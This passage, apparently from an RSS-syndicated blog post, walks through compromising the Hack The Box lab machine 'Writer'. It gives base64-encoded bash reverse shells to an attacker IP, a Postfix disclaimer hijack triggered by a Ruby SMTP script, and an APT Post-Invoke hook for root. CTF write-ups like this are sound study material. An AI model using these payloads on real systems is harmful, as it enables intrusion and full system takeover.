&lt;pre class="highlight shell"&gt;&lt;code&gt;alcadramin@archlinux ➜ ~  &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="s1"&gt;'/bin/bash -c "/bin/bash -i &amp;gt;&amp;amp; /dev/tcp/10.10.14.174/7678 0&amp;gt;&amp;amp;1"'&lt;/span&gt; | &lt;span class="nb"&gt;base64
&lt;/span&gt;&lt;span class="nv"&gt;L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTc0LzMxMzYgMD4mMSI&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's run the tool and bind it to a random IP. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--vhFDPjLT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/68b567836127" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--vhFDPjLT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/68b567836127" alt="Natbypass" width="880" height="278"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we'll add our payload to &lt;code&gt;/etc/postfix/disclaimer&lt;/code&gt; and listen through &lt;code&gt;ncat&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--sUpLQ63y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/82b304323c01" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--sUpLQ63y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/82b304323c01" alt="Revshell" width="880" height="286"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo &lt;/span&gt;&lt;span class="nv"&gt;L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTc0Lzc2NzggMD4mMSI&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; | bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now that they're done, I'm gonna write a script with Ruby to send an email and execute the payload.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ruby"&gt;&lt;code&gt;&lt;span class="c1"&gt;#!/usr/bin/env ruby&lt;/span&gt;

&lt;span class="nb"&gt;require&lt;/span&gt; &lt;span class="s1"&gt;'net/smtp'&lt;/span&gt;
&lt;span class="nb"&gt;require&lt;/span&gt; &lt;span class="s1"&gt;'openssl'&lt;/span&gt;
&lt;span class="no"&gt;OpenSSL&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="no"&gt;SSL&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="no"&gt;VERIFY_PEER&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="no"&gt;OpenSSL&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="no"&gt;SSL&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="no"&gt;VERIFY_NONE&lt;/span&gt;

&lt;span class="n"&gt;message&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;MESSAGE_END&lt;/span&gt;&lt;span class="sh"&gt;
Hey John, give me your shell pls.
&lt;/span&gt;&lt;span class="no"&gt;MESSAGE_END&lt;/span&gt;

&lt;span class="no"&gt;Net&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="no"&gt;SMTP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;start&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'10.10.11.101'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3137&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="n"&gt;smtp&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;
  &lt;span class="n"&gt;smtp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;send_message&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'kyle@10.10.11.101'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'john@10.10.11.101'&lt;/span&gt;
&lt;span class="k"&gt;end&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Hey we're in John now. I've quickly realise there is a private ssh key, so I can use that to connect with ssh!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--vZUC0LgP--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/e60e829e9abe" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--vZUC0LgP--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/e60e829e9abe" alt="nc capture" width="880" height="147"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--0hFAvpHB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/fc3013d2b11e" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--0hFAvpHB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/fc3013d2b11e" alt="ssh key" width="880" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can check John's groups.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;john@writer:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;id
&lt;/span&gt;&lt;span class="nv"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1001&lt;span class="o"&gt;(&lt;/span&gt;john&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;gid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1001&lt;span class="o"&gt;(&lt;/span&gt;john&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;groups&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1001&lt;span class="o"&gt;(&lt;/span&gt;john&lt;span class="o"&gt;)&lt;/span&gt;,1003&lt;span class="o"&gt;(&lt;/span&gt;management&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I am just gonna upload &lt;code&gt;pspy64&lt;/code&gt; to John via sftp and check running processes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;alcadramin@archlinux ➜ Writer  sftp &lt;span class="nt"&gt;-i&lt;/span&gt; john_key john@10.10.11.101
Connected to 10.10.11.101.
sftp&amp;gt; put /home/alcadramin/pwn/pspy64
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Privilege Escalation
&lt;/h2&gt;

&lt;p&gt;So I ran &lt;code&gt;pspy64&lt;/code&gt; and realise this naughty boy is running APT via cron and we also have access to APT hooks so we can create a payload in &lt;code&gt;/etc/apt/apt.conf.d&lt;/code&gt;. (&lt;a href="https://wiki.debian.org/AptConfiguration"&gt;https://wiki.debian.org/AptConfiguration&lt;/a&gt;)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;2021/12/03 18:08:02 CMD: &lt;span class="nv"&gt;UID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0    &lt;span class="nv"&gt;PID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;27301  | /usr/bin/apt-get update 
2021/12/03 18:09:01 CMD: &lt;span class="nv"&gt;UID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0    &lt;span class="nv"&gt;PID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;27326  | /usr/sbin/CRON &lt;span class="nt"&gt;-f&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'APT::Update::Post-Invoke {"echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTc0LzEyMTIgMD4mMSI= | base64 -d | bash"};'&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; 01payload
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And we got root access!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--IRTI6uav--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/297654db064f" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--IRTI6uav--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/297654db064f" alt="root" width="657" height="189"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Finally I'm submitting my hashes!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NN_YVjwk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/ce2ec64917eb" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NN_YVjwk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/ce2ec64917eb" alt="pawned" width="696" height="640"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Thank you for reading this article, hope you've had fun and learned something! See you next time!&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>hackthebox</category>
      <category>hacking</category>
    </item>
  </channel>
</rss>
